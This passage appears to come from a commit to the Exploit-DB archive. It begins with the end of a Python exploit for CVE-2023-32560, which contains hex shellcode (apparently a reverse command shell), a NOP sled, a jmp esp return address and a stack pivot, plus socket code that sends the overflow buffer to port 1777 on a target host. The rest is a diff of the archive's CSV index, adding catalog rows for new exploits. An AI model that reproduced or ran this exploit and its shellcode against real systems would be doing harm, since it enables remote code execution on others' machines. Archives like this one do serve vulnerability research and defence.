shellcode += b"fce8820000006089e531c064"
shellcode += b"8b50308b520c8b52148b7228"
shellcode += b"0fb74a2631ffac3c617c022c"
shellcode += b"20c1cf0d01c7e2f252578b52"
shellcode += b"108b4a3c8b4c1178e34801d1"
shellcode += b"518b592001d38b4918e33a49"
shellcode += b"8b348b01d631ffacc1cf0d01"
shellcode += b"c738e075f6037df83b7d2475"
shellcode += b"e4588b582401d3668b0c4b8b"
shellcode += b"581c01d38b048b01d0894424"
shellcode += b"245b5b61595a51ffe05f5f5a"
shellcode += b"8b12eb8d5d68333200006877"
shellcode += b"73325f54684c772607ffd5b8"
shellcode += b"9001000029c454506829806b"
shellcode += b"00ffd5505050504050405068"
shellcode += b"ea0fdfe0ffd5976a0568c0a8"
shellcode += b"561e680200115c89e66a1056"
shellcode += b"576899a57461ffd585c0740c"
shellcode += b"ff4e0875ec68f0b5a256ffd5"
shellcode += b"68636d640089e357575731f6"
shellcode += b"6a125956e2fd66c744243c01"
shellcode += b"018d442410c6004454505656"
shellcode += b"5646564e565653566879cc3f"
shellcode += b"86ffd589e04e5646ff306808"
shellcode += b"871d60ffd5bbe01d2a0a68a6"
shellcode += b"95bd9dffd53c067c0a80fbe0"
shellcode += b"7505bb4713726f6a0053ffd5"
buf = b'90' * 340
buf += b'812b4100' # jmp esp (0x00412b81)
buf += b'90909090'
buf += b'90909090'
buf += shellcode
buf += b'41' * 80
buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)
buf += b'43' * (0x800 - len(buf))
buf2 = b'41' * 0x1000
# Create message payload
hdr = [Item(3, "pwned", buf)]
payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary
hp_instance = HP(hdr, payload)
msg_instance = Msg(hp_instance)
# Default port
port = 1777
# check for target host argument
if len(sys.argv) > 1:
host = sys.argv[1]
else:
print("Usage: python3 CVE-2023-32560.py <host ip>")
sys.exit()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.sendall(msg_instance.pack())
print("Message sent!")
s.close()

21
files_exploits.csv
View file

@ -4299,6 +4299,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44580,exploits/hardware/webapps/44580.txt,"DLINK DCS-5020L - Remote Code Execution (PoC)",2018-03-27,"Fidus InfoSecurity",webapps,hardware,,2018-05-03,2022-11-04,0,CVE-2017-17020,,,,,https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/
44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,,2018-04-02,2018-04-02,0,CVE-2018-5708,,,,,
45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,,2018-08-30,2018-08-30,0,CVE-2018-12710,,,,,
51709,exploits/hardware/webapps/51709.txt,"DLINK DPH-400SE - Exposure of Sensitive Information",2023-09-04,tahaafarooq,webapps,hardware,,2023-09-04,2023-09-04,0,,,,,,
43898,exploits/hardware/webapps/43898.html,"Dodocool DC38 N300 - Cross-site Request Forgery",2018-01-26,"Raffaele Sabato",webapps,hardware,,2018-01-26,2018-01-26,0,CVE-2018-5720,,,,,
48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,,2020-05-07,2020-05-07,0,,,,,,
36286,exploits/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",webapps,hardware,,2011-11-04,2017-07-19,1,CVE-2011-4716;OSVDB-73430,,,,,https://www.securityfocus.com/bid/50520/info
@ -11781,6 +11782,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,,2017-09-27,2017-09-27,0,,,,,,https://forsec.nl/2017/09/smart-home-remote-command-execution-rce/
48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,,2020-03-23,2020-03-23,0,,,,,,
50717,exploits/multiple/webapps/50717.txt,"FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2022-02-08,"FEBIN MON SAJI",webapps,multiple,,2022-02-08,2022-02-08,0,CVE-2021-46398,,,,,
51708,exploits/multiple/webapps/51708.py,"FileMage Gateway 1.10.9 - Local File Inclusion",2023-09-04,"Bryce Raindayzz Harty",webapps,multiple,,2023-09-04,2023-09-04,0,CVE-2023-39026,,,,,
48607,exploits/multiple/webapps/48607.txt,"FileRun 2019.05.21 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,,2020-06-22,2020-06-22,0,CVE-2019-12905,,,,,
23111,exploits/multiple/webapps/23111.txt,"FirePass SSL VPN - Local File Inclusion",2012-12-03,"SEC Consult",webapps,multiple,,2012-12-03,2012-12-03,0,OSVDB-88091,,,,,
35743,exploits/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Cross-Site Scripting",2011-05-13,MustLive,webapps,multiple,,2011-05-13,2015-01-10,1,,,,,,https://www.securityfocus.com/bid/47845/info
@ -13315,6 +13317,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info
@ -13490,6 +13493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4005,exploits/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",webapps,php,,2007-05-28,2016-12-22,1,OSVDB-38364;CVE-2007-2986,,,,,
43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,,2018-01-15,2018-12-14,0,,,,,,
9075,exploits/php/webapps/9075.txt,"AdminLog 0.5 - 'valid_login' Authentication Bypass",2009-07-02,SirGod,webapps,php,,2009-07-01,,1,OSVDB-55602,,,,,
51705,exploits/php/webapps/51705.txt,"AdminLTE PiHole 5.18 - Broken Access Control",2023-09-04,kv1to,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-23513,,,,,
6640,exploits/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,webapps,php,,2008-09-30,2016-12-23,1,CVE-2006-0123;OSVDB-22240,,,,http://www.exploit-db.comadnforum-1.0b.zip,
6557,exploits/php/webapps/6557.txt,"ADN Forum 1.0b - Insecure Cookie Handling",2008-09-24,Pepelux,webapps,php,,2008-09-23,2016-12-23,1,OSVDB-52458;CVE-2008-6001,,,,http://www.exploit-db.comadnforum-1.0b.zip,
28104,exploits/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",webapps,php,,2006-06-26,2013-09-05,1,OSVDB-27620,,,,,https://www.securityfocus.com/bid/18638/info
@ -14904,6 +14908,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28574,exploits/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",webapps,php,,2006-09-14,2013-09-27,1,CVE-2006-4829;OSVDB-28834,,,,,https://www.securityfocus.com/bid/20026/info
5234,exploits/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,webapps,php,,2008-03-10,2016-11-23,1,OSVDB-42778;CVE-2008-1313,,,,http://www.exploit-db.combloo.v.1.00.tgz,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",2021-10-01,"Nitin Sharma",webapps,php,,2021-10-01,2021-10-28,0,,,,,,
51697,exploits/php/webapps/51697.txt,"Blood Donor Management System v1.0 - Stored XSS",2023-09-04,"Ehlullah Albayrak",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,,2020-01-02,2020-02-07,1,,,,,,
48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,,2020-09-03,2020-09-03,0,,,,,,
4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php,,2008-01-19,2016-10-27,1,OSVDB-40437;CVE-2008-0428;OSVDB-40436;CVE-2008-0427,,,,,http://bugreport.ir/?/27
@ -15159,6 +15164,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2023-07-15,1,,,,,,
50235,exploits/php/webapps/50235.txt,"Bus Pass Management System 1.0 - 'viewid' SQL Injection",2021-08-30,"Aryan Chehreghani",webapps,php,,2021-08-30,2023-07-15,1,,,,,,
51054,exploits/php/webapps/51054.txt,"Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)",2023-03-25,"Ali Alipour",webapps,php,,2023-03-25,2023-06-26,1,CVE-2022-35155,,,,,
51712,exploits/php/webapps/51712.txt,"Bus Reservation System 1.1 - Multiple-SQLi",2023-09-04,nu11secur1ty,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
9633,exploits/php/webapps/9633.txt,"Bus Script - 'sitetext_id' SQL Injection",2009-09-10,Mr.SQL,webapps,php,,2009-09-09,,1,OSVDB-57985;CVE-2009-4618;OSVDB-57984,,,,,
41561,exploits/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php,,2017-01-18,2017-01-18,0,,,,,,
@ -16379,6 +16385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27835,exploits/php/webapps/27835.txt,"Creative Software UK Community Portal 1.1 - 'PollResults.php' Multiple SQL Injections",2006-05-08,r0t,webapps,php,,2006-05-08,2013-08-25,1,CVE-2006-2255;OSVDB-25311,,,,,https://www.securityfocus.com/bid/17890/info
11300,exploits/php/webapps/11300.txt,"Creative SplashWorks-SplashSite - 'page.php' Blind SQL Injection",2010-01-31,AtT4CKxT3rR0r1ST,webapps,php,,2010-01-30,,0,,,,,,
12807,exploits/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,webapps,php,,2010-05-29,,1,,,,,,
51701,exploits/php/webapps/51701.txt,"Credit Lite 1.5.4 - SQL Injection",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4407,,,,,
1446,exploits/php/webapps/1446.pl,"creLoaded 6.15 - 'HTMLAREA' Automated Perl",2006-01-24,kaneda,webapps,php,,2006-01-23,,1,OSVDB-22793;CVE-2006-0478,,,,,
35631,exploits/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",webapps,php,,2011-04-19,2014-12-27,1,,,,,,https://www.securityfocus.com/bid/47416/info
50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-08-18,"Davide Taraschi",webapps,php,,2021-08-18,2021-08-18,0,,,,,,
@ -16425,6 +16432,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",2022-03-30,"Rahad Chowdhury",webapps,php,,2022-03-30,2022-03-30,0,CVE-2021-43701,,,,,
49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",2021-01-05,SunCSR,webapps,php,,2021-01-05,2021-01-05,0,,,,,,
50899,exploits/php/webapps/50899.txt,"CSZ CMS 1.3.0 - 'Multiple' Blind SQLi",2022-05-11,"Dogukan Dincer",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
51703,exploits/php/webapps/51703.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
51704,exploits/php/webapps/51704.txt,"CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')",2023-09-04,"Daniel González",webapps,php,,2023-09-04,2023-09-04,0,,,,,,
31517,exploits/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",webapps,php,80,2014-02-07,2014-02-07,0,CVE-2013-2639;OSVDB-103117,,,,,
11063,exploits/php/webapps/11063.txt,"CU Village CMS Site 1.0 - 'print_view' Blind SQL Injection",2010-01-08,Red-D3v1L,webapps,php,,2010-01-07,,1,,,,,,
11495,exploits/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-17,,1,,,,,,
@ -19628,6 +19637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,,2018-06-28,2018-06-28,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
16213,exploits/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,AtT4CKxT3rR0r1ST,webapps,php,,2011-02-23,2011-02-23,1,,,,,,
29909,exploits/php/webapps/29909.txt,"HYIP Manager Pro - Multiple Remote File Inclusions",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2326;OSVDB-35554,,,,,https://www.securityfocus.com/bid/23663/info
51698,exploits/php/webapps/51698.txt,"Hyip Rio 2.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4382,,,,,
32395,exploits/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 - Database Disclosure",2008-09-19,r45c4l,webapps,php,,2008-09-19,2014-03-20,1,CVE-2008-7008;OSVDB-48282,,,,,https://www.securityfocus.com/bid/31249/info
46776,exploits/php/webapps/46776.txt,"Hyvikk Fleet Manager - Shell Upload",2019-04-30,saxgy1331,webapps,php,,2019-04-30,2019-05-01,0,,,,,,
41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",webapps,php,,2017-05-09,2017-05-09,1,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comI-Librarian-4.6-Linux.tar.xz,
@ -23180,6 +23190,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39124,exploits/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Local File Inclusion",2014-03-10,Dr.3v1l,webapps,php,,2014-03-10,2016-10-24,1,OSVDB-105001,,,,,https://www.securityfocus.com/bid/66317/info
5648,exploits/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User",2008-05-18,t0pP8uZz,webapps,php,,2008-05-17,2016-12-02,1,OSVDB-45512;CVE-2008-2348,,,,http://www.exploit-db.commeltingice_file_system_v1.0.zip,
12850,exploits/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,webapps,php,,2010-06-02,,1,,,,,,
51710,exploits/php/webapps/51710.txt,"Member Login Script 3.3 - Client-side desync",2023-09-04,nu11secur1ty,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
7638,exploits/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,webapps,php,,2008-12-31,2017-01-11,1,OSVDB-51207,,,,,
31011,exploits/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,webapps,php,,2008-01-11,2014-01-17,1,CVE-2008-0289;OSVDB-40326,,,,,https://www.securityfocus.com/bid/27244/info
41780,exploits/php/webapps/41780.txt,"Membership Formula - 'order' SQL Injection",2017-03-31,"Ihsan Sencan",webapps,php,,2017-03-31,2017-03-31,0,,,,,,
@ -30012,6 +30023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
7946,exploits/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,webapps,php,,2009-02-01,,1,OSVDB-51822;CVE-2009-0456,,,,,
45736,exploits/php/webapps/45736.txt,"South Gate Inn Online Reservation System 1.0 - 'q' SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80,2018-10-30,2018-10-30,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comsouthgateinn_0.zip,
11430,exploits/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-12,,1,,,,,,
51713,exploits/php/webapps/51713.txt,"SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,CVE-2023-4547,,,,,
12756,exploits/php/webapps/12756.txt,"Spaceacre - '/index.php' SQL Injection / HTML / Cross-Site Scripting Injection",2010-05-26,CoBRa_21,webapps,php,,2010-05-25,,1,,,,,,
12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,webapps,php,,2010-05-09,,1,,,,,,
12746,exploits/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,webapps,php,,2010-05-25,,1,,,,,,
@ -32133,8 +32145,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17057,exploits/php/webapps/17057.txt,"webEdition CMS - Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2011-10-02,0,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,http://eidelweiss-advisories.blogspot.com/2011/03/webedition-cms-version-6102.html
35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,webapps,php,,2011-03-28,2014-12-10,1,,,,,,https://www.securityfocus.com/bid/47065/info
17054,exploits/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",webapps,php,,2011-03-27,2011-03-29,1,,,,,http://www.exploit-db.comwebEdition_6102.tar.gz,
51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-08-04,0,,,,,,
51661,exploits/php/webapps/51661.txt,"Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
51662,exploits/php/webapps/51662.txt,"Webedition CMS v2.9.8.8 - Stored XSS",2023-08-04,"Mirabbas Ağalarov",webapps,php,,2023-08-04,2023-09-04,1,,,,,,
14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php,,2010-06-30,2010-07-07,0,OSVDB-65930,,,,http://www.exploit-db.comwebERP_3.11.4.zip,
35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46341/info
19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php,,2012-06-28,2012-06-29,1,OSVDB-83414;OSVDB-83400,,,,,
@ -33898,6 +33910,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-06-09,1,CVE-2022-1565,,,,,
51560,exploits/php/webapps/51560.txt,"WP AutoComplete 1.0.4 - Unauthenticated SQLi",2023-07-03,matitanium,webapps,php,,2023-07-03,2023-07-03,0,CVE-2022-4297,,,,,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
51711,exploits/php/webapps/51711.py,"WP Statistics Plugin 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)",2023-09-04,psychoSherlock,webapps,php,,2023-09-04,2023-09-04,0,CVE-2022-25148,,,,,
51533,exploits/php/webapps/51533.py,"WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)",2023-06-20,"Amirhossein Bahramizadeh",webapps,php,,2023-06-20,2023-06-20,0,CVE-2023-3320,,,,,
51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
@ -40065,6 +40078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
17607,exploits/windows/local/17607.rb,"FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",local,windows,,2011-08-04,2011-08-06,1,,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt18000/17607.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe,
15727,exploits/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Local Buffer Overflow",2010-12-11,zota,local,windows,,2010-12-11,2011-06-23,1,OSVDB-72290,,,http://www.exploit-db.com/screenshots/idlt16000/freeamp.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe,
17449,exploits/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Local Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",local,windows,,2011-06-24,2011-06-25,1,,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-06-25-at-83233-am.png,http://www.exploit-db.comfreeampsetup_2_0_7.exe,
51706,exploits/windows/local/51706.txt,"Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow",2023-09-04,"Waqas Ahmed Faroouqi",local,windows,,2023-09-04,2023-09-04,0,,,,,,
48043,exploits/windows/local/48043.txt,"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeFTPd.exe,
49630,exploits/windows/local/49630.txt,"FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path",2021-03-09,"Mohammed Alshehri",local,windows,,2021-03-09,2021-03-09,0,,,,,,
48044,exploits/windows/local/48044.txt,"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path",2020-02-11,boku,local,windows,,2020-02-11,2020-02-11,0,,,,,http://www.exploit-db.comfreeSSHd.exe,
@ -40324,6 +40338,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11872,exploits/windows/local/11872.py,"KenWard's Zipper 1.400 - Local Buffer Overflow (2)",2010-03-25,sinn3r,local,windows,,2010-03-24,2011-01-03,1,OSVDB-63125,,,http://www.exploit-db.com/screenshots/idlt12000/screen-shot-2011-01-03-at-82314-pm.png,http://www.exploit-db.cominstzip3.exe,
29374,exploits/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Local Privilege Escalation",2007-01-01,"Matousec Transparent security",local,windows,,2007-01-01,2013-11-11,1,CVE-2007-0081;OSVDB-33356,,,,,https://www.securityfocus.com/bid/21828/info
50470,exploits/windows/local/50470.py,"Kingdia CD Extractor 3.0.2 - Buffer Overflow (SEH)",2021-11-02,stresser,local,windows,,2021-11-02,2021-11-02,0,,,,,http://www.exploit-db.comkingdia-cd-ex.exe,
51707,exploits/windows/local/51707.txt,"Kingo ROOT 1.5.8 - Unquoted Service Path",2023-09-04,"Anish Feroz",local,windows,,2023-09-04,2023-09-04,0,,,,,,
17561,exploits/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,local,windows,,2011-07-22,2019-03-07,0,,,,,,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,,2018-01-03,2018-01-15,1,,Local,,,,https://blogs.securiteam.com/index.php/archives/3597
29922,exploits/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Local Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",local,windows,,2013-12-02,2013-12-02,1,CVE-2013-3934,,,http://www.exploit-db.com/screenshots/idlt30000/screen-shot-2013-12-02-at-105654.png,http://www.exploit-db.comoffice_suite_free_2012.exe,
@ -41063,6 +41078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4703,exploits/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",local,windows,,2007-12-07,2016-10-25,1,OSVDB-41695;CVE-2007-6403,,,,http://www.exploit-db.comwinamp532_full.exe,
14789,exploits/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3137;OSVDB-67532,,,,http://www.exploit-db.comwinamp558_full_emusic-7plus_en-us.exe,
6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows,,2008-09-05,,1,OSVDB-47975;CVE-2008-4470,,,,,
51700,exploits/windows/local/51700.txt,"NVClient v5.0 - Stack Buffer Overflow (DoS)",2023-09-04,"Ahmet Ümit BAYRAM",local,windows,,2023-09-04,2023-09-04,0,,,,,,
24207,exploits/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Local Buffer Overflow",2013-01-18,"Jon Bailey",local,windows,,2013-01-18,2017-11-15,0,OSVDB-88745,,,,,
14769,exploits/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,Encrypt3d.M!nd,local,windows,,2010-08-25,2010-08-25,0,OSVDB-67574,,nvidia-poc.rar,,,
40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation",2016-10-31,"Google Security Research",local,windows,,2016-10-31,2016-10-31,1,CVE-2016-8812,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=918
@ -43272,6 +43288,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34830,exploits/windows/remote/34830.c,"IsoBuster 2.7 - 'wnaspi32.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows,,2010-10-10,2014-10-01,1,,,,,,https://www.securityfocus.com/bid/43912/info
16464,exploits/windows/remote/16464.rb,"ISS - 'PAM.dll' ICQ Parser Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2004-0362;OSVDB-4355,"Metasploit Framework (MSF)",,,,http://www.eeye.com/html/Research/Advisories/AD20040318.html
